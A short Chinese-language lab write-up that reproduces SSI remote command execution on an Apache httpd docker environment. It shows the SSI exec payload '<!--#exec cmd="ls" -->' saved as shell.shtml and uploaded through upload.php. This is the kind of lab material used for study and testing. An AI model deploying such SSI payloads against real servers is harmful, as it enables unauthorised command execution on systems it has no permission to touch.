漏洞原理
目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。
使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。
漏洞复现
1、docker内漏洞位置 httpd/ssi-rce
执行命令docker-compose up -d拉取镜像
打开本地地址8080端口upload.php
2、写入<!--#exec cmd="ls" -->并保存成shell.shtml文件
3、将文件上传并访问
文件上传成功。
复现完成后记得关闭镜像,防止端口占用问题
